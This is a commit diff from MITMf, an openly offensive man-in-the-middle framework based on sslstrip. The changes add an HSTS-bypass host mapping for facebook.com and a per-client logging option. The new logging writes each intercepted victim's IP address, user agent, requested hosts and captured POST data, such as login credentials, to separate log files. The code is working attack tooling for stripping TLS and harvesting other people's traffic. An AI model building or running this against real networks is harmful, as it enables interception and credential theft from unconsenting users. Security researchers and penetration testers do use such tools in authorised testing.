merged changes from dev

byt3bl33d3r · Nov 29, 2014 · 9f4ddc5 · 9f4ddc5
2 parents d454b03 + 2120827
commit 9f4ddc5
Show file tree

Hide file tree

Showing 8 changed files with 66 additions and 24 deletions.
diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg
@@ -7,4 +7,5 @@ mail.google.com = gmail.google.com
 accounts.google.se = cuentas.google.se
 
 #for facebook
-www.facebook.com = social.facebook.com
+www.facebook.com = social.facebook.com
+facebook.com = social.facebook.com
diff --git a/mitmf.py b/mitmf.py
@@ -28,7 +28,7 @@
     slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
     slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
     slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
-    #slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file')
+    slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file')
     sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
     sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
     sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
@@ -83,7 +83,7 @@
         from sslstrip.StrippingProxyHSTS import StrippingProxy
         from sslstrip.URLMonitorHSTS import URLMonitor
 
-        URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
+        URLMonitor.getInstance().setValues(args.favicon, args.clients)
         CookieCleaner.getInstance().setEnabled(args.killsessions)
         ProxyPlugins.getInstance().setPlugins(load)
 
@@ -100,7 +100,7 @@
         from sslstrip.StrippingProxy import StrippingProxy
         from sslstrip.URLMonitor import URLMonitor
 
-        URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
+        URLMonitor.getInstance().setValues(args.favicon, args.clients)
         CookieCleaner.getInstance().setEnabled(args.killsessions)
         ProxyPlugins.getInstance().setPlugins(load)
 

diff --git a/sslstrip/ClientRequestHSTS.py b/sslstrip/ClientRequestHSTS.py
@@ -78,11 +78,11 @@ def cleanHeaders(self):
         	del headers['if-none-match']
 
         if 'host' in headers:
-        	host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
-        	logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
-        	headers['host'] = host
-        	headers['securelink'] = '1'
-        	self.setHeader('Host',host)
+            host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+            logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
+            headers['host'] = host
+            headers['securelink'] = '1'
+            self.setHeader('Host',host)
 
         self.plugins.hook()
 
@@ -116,7 +116,12 @@ def handleHostResolvedSuccess(self, address):
         host = self.urlMonitor.URLgetRealHost("%s" % lhost)
         client = self.getClientIP()
         path = self.getPathFromUri()
-        self.content.seek(0, 0)
+
+        try:
+            self.content.seek(0, 0)
+        except:
+            pass
+
         postData = self.content.read()
         real = self.urlMonitor.real
         patchDict = self.urlMonitor.patchDict

diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py
@@ -54,7 +54,12 @@ def getPostPrefix(self):
 
     def sendRequest(self):
         if self.command == 'GET':
-            logging.info("%s Sending Request: %s"  % (self.client.getClientIP(), self.headers['host']))
+            message = "%s Sending Request: %s"  % (self.client.getClientIP(), self.headers['host'])
+            if self.urlMonitor.isClientLogging() is True:
+                self.urlMonitor.writeClientLog(self.client, self.headers, message)
+            else:
+                logging.info(message)
+
         self.plugins.hook()
         self.sendCommand(self.command, self.uri)
 
@@ -71,7 +76,11 @@ def sendPostData(self):
         elif 'keylog' in self.uri:
             self.plugins.hook()
         else:
-            logging.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData))
+            message = "%s %s Data (%s):\n%s" % (self.client.getClientIP(),self.getPostPrefix(),self.headers['host'],self.postData)
+            if self.urlMonitor.isClientLogging() is True:
+                self.urlMonitor.writeClientLog(self.client, self.headers, message)
+            else:
+                logging.warning(message)
             self.transport.write(self.postData)
 
     def connectionMade(self):
@@ -88,6 +97,8 @@ def handleStatus(self, version, code, message):
         self.client.setResponseCode(int(code), message)
 
     def handleHeader(self, key, value):
+        self.plugins.hook()
+
         if (key.lower() == 'location'):
             value = self.replaceSecureLinks(value)
 
@@ -100,8 +111,9 @@ def handleHeader(self, key, value):
             if (value.find('gzip') != -1):
                 logging.debug("Response is compressed...")
                 self.isCompressed = True
-        if (key.lower() == 'strict-transport-security'):
-            value = 'max-age=0'
+
+        #if (key.lower() == 'strict-transport-security'):
+        #    value = 'max-age=0'
 
         elif (key.lower() == 'content-length'):
             self.contentLength = value
@@ -110,8 +122,6 @@ def handleHeader(self, key, value):
         else:
             self.client.setHeader(key, value)
 
-        self.plugins.hook()
-
     def handleEndHeaders(self):
        if (self.isImageRequest and self.contentLength != None):
            self.client.setHeader("Content-Length", self.contentLength)

diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py
@@ -40,5 +40,7 @@ def clientConnectionFailed(self, connector, reason):
             logging.debug("Retrying via SSL")
             self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
         else:
-            self.client.finish()
-
+            try:
+                self.client.finish()
+            except:
+                pass
diff --git a/sslstrip/StrippingProxy.py b/sslstrip/StrippingProxy.py
@@ -20,6 +20,7 @@
 from ClientRequest import ClientRequest
 
 class StrippingProxy(HTTPChannel):
+
     '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
     This is the basic proxy server class, where we get callbacks for GET and POST methods.
     We then proxy these out using HTTP or HTTPS depending on what information we have about

diff --git a/sslstrip/URLMonitor.py b/sslstrip/URLMonitor.py
@@ -16,7 +16,7 @@
 # USA
 #
 
-import re
+import re, os
 
 class URLMonitor:    
 
@@ -41,6 +41,25 @@ def isSecureLink(self, client, url):
 
         return (client,url) in self.strippedURLs
 
+    def writeClientLog(self, client, headers, message):
+        if not os.path.exists("./logs"):
+            os.makedirs("./logs")
+
+        if (client.getClientIP() + '.log') not in os.listdir("./logs"):
+
+            try:
+                log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent'])
+            except KeyError:
+                log_message = "#Log file for %s\n" % client.getClientIP()
+
+            log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
+            log_file.write(log_message + message + "\n")
+            log_file.close()
+        else:
+            log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
+            log_file.write(message + "\n")
+            log_file.close()
+
     def getSecurePort(self, client, url):
         if (client,url) in self.strippedURLs:
             return self.strippedURLPorts[(client,url)]
@@ -69,12 +88,16 @@ def addSecureLink(self, client, url):
         self.strippedURLs.add((client, url))
         self.strippedURLPorts[(client, url)] = int(port)
 
-    def setFaviconSpoofing(self, faviconSpoofing):
+    def setValues(self, faviconSpoofing, clientLogging):
         self.faviconSpoofing = faviconSpoofing
+        self.clientLogging = clientLogging
 
     def isFaviconSpoofing(self):
         return self.faviconSpoofing
 
+    def isClientLogging(self):
+        return self.clientLogging
+
     def isSecureFavicon(self, client, url):
         return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
 

diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py
@@ -64,14 +64,14 @@ def addSecureLink(self, client, url):
 
 		#LEO: Sustituir HOST
         if not self.sustitucion.has_key(host):
-        	lhost = host[:4]
-        	if lhost=="www.":
+            lhost = host[:4]
+            if lhost=="www.":
         		self.sustitucion[host] = "w"+host
         		self.real["w"+host] = host
-        	else:
+            else:
         		self.sustitucion[host] = "web"+host
         		self.real["web"+host] = host
-        	#logging.info("LEO: ssl host      (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
+            logging.info("LEO: ssl host      (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
 
         url = 'http://' + host + path
         #logging.debug("LEO stripped URL: %s %s"%(client, url))